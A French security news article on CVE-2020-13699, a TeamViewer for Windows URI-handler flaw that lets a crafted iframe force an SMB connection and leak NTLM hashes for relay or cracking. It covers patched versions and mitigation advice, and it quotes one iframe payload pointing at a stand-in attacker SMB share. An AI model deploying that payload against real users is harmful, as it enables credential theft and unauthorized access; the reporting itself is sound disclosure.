TeamViewer, une faille découverte dans l’application Windows

Le logiciel de support à distance TeamViewer a corrigé une faille de haute gravité dans son application pour Windows. Si elle est exploitée, la faille pourrait permettre à des attaquants distants non authentifiés d’exécuter du code sur les systèmes des utilisateurs ou de déchiffrer leurs mots de passe TeamViewer.

TeamViewer est une application logicielle propriétaire utilisée par les entreprises pour les fonctionnalités de contrôle à distance, le partage de bureau, les réunions en ligne, les conférences Web et le transfert de fichiers entre ordinateurs. La faille récemment découverte est causée par le fait que l’application pour Windows (CVE-2020-13699) ne cite pas correctement ses gestionnaires d’identificateurs de ressources uniformes (URI) personnalisés.

Les applications doivent identifier les URI des sites Web qu’elles gèrent. Mais étant donné que les applications de gestionnaire peuvent recevoir des données provenant de sources non approuvées, les valeurs d’URI transmises à l’application peuvent contenir des données malveillantes qui tentent d’exploiter l’application. Dans ce cas précis, les valeurs ne sont pas «citées» par l’application – ce qui signifie que TeamViewer les traitera comme des commandes plutôt que comme des valeurs d’entrée.

“Un attaquant pourrait intégrer une iframe malveillante dans un site Web avec une URL spécialement conçue (<iframe src=’teamviewer10: -play \\attacker-IP\share\fake.tvs’>) qui lancerait le client TeamViewer sur Windows et le forcerait à ouvrir un partage SMB distant”, selon un avis de Jeffrey Hofmann, ingénieur en sécurité chez Praetorian, qui a révélé la faille.

TeamViewer

Pour lancer l’attaque, l’attaquant pourrait simplement persuader un utilisateur de TeamViewer de cliquer sur l’URL spécialement conçue dans un site Web, une opportunité pour les attaquants de lancer potentiellement des attaques watering-hole.

L’URI incitera ensuite l’application à créer une connexion avec le protocole SMB (Server Message Block) distant contrôlé par l’attaquant. SMB est un protocole réseau utilisé par les ordinateurs Windows qui permet aux systèmes du même réseau de partager des fichiers.

Une fois que l’application TeamViewer d’une victime a lancé le partage SMB distant, Windows établira la connexion à l’aide de NT LAN Manager (NTLM). NTLM utilise un protocole chiffré pour authentifier un utilisateur sans transférer le mot de passe de l’utilisateur. Les informations d’identification NTLM sont basées sur les données obtenues pendant le processus de connexion interactive et se composent d’un nom de domaine, d’un nom d’utilisateur et d’un hachage unidirectionnel du mot de passe de l’utilisateur.

Dans ce scénario d’attaque, la requête NTLM peut ensuite être relayée par des attaquants à l’aide d’un outil tel que Responder, selon Hofmann. La boîte à outils du répondeur capture les sessions d’authentification SMB sur un réseau interne et les transmet à une machine cible. Cela permet en fin de compte aux attaquants d’accéder automatiquement à la machine de la victime. Cela leur permet également de capturer des hachages de mots de passe, qu’ils peuvent ensuite craquer via la force brute.

Heureusement pour les utilisateurs, alors que l’impact potentiel de cette vulnérabilité est élevé, «l’impact pratique est faible», a expliqué Hofmann. «Réussir l’attaque est difficile et nécessite une interaction de l’utilisateur. Il existe de nombreuses conditions préalables pour exploiter la vulnérabilité avec succès. Tous les navigateurs modernes, à l’exception de Firefox, encode les espaces d’URL lors de la transmission aux gestionnaires d’URI, ce qui empêche efficacement cette attaque. »

teamviewer

La faille a une note de 8,8 sur 10 sur l’échelle CVSS, ce qui la rend très grave. Les versions de TeamViewer antérieures à 15.8.3 sont vulnérables, et la faille affecte différentes versions de TeamViewer, notamment: teamviewer10, teamviewer8, teamviewerapi, tvchat1, tvcontrol1, tvfiletransfer1, tvjoinv8, tvpresent1, tvsendfile1, tvsqcustomer1, tvsqsupport1 et tvvidevide1.

Le problème est résolu dans les versions 8.0.258861, 9.0.258860, 10.0.258873, 11.0.258870, 12.0.258869, 13.2.36220, 14.2.56676, 14.7.48350 et 15.8.3, ont déclaré les chercheurs.

Afin de corriger la faille, «nous avons mis en œuvre des améliorations dans la gestion des URI relatives à CVE 2020-13699», selon TeamViewer dans un communiqué. «Merci, Jeffrey Hofmann de Praetorian, pour votre professionnalisme et votre suivi d’un modèle de divulgation responsable. Nous sommes heureux que vous nous ayez contactés et que vous ayez pu confirmer la correction de vos trouvailles dans la dernière version. “

Que faire pour se protéger de cette faille de TeamViewer?

Dans un avis de sécurité concernant la faille, le Center for Internet Security (CIS) a recommandé aux utilisateurs de TeamViewer d’appliquer les correctifs appropriés. Ils ont également recommandé aux utilisateurs d’éviter les sites Web non fiables ou les liens fournis par des sources inconnues et «d’informer les utilisateurs des menaces posées par les liens hypertextes contenus dans les e-mails ou les pièces jointes, en particulier provenant de sources non fiables».

Les fonctionnalités de contrôle à distance de TeamViewer en font une cible d’attaque lucrative pour les individus malveillants, en particulier avec de plus en plus d’entreprises se tournant vers des applications de collaboration comme TeamViewer pendant la pandémie. En 2019, une attaque ciblée par e-mail contre des responsables de l’ambassade et des autorités financières gouvernementales utilisait TeamViewer pour prendre le contrôle total d’un ordinateur infecté. Et plus tôt en 2020, une nouvelle variante du cheval de Troie Cerberus incorporait des capacités de collecte d’informations largement étendues et plus sophistiquées, et la possibilité d’exécuter TeamViewer.

S’abonner
Notifier de
guest
0 Commentaires
Inline Feedbacks
View all comments
0
Would love your thoughts, please comment.x
()
x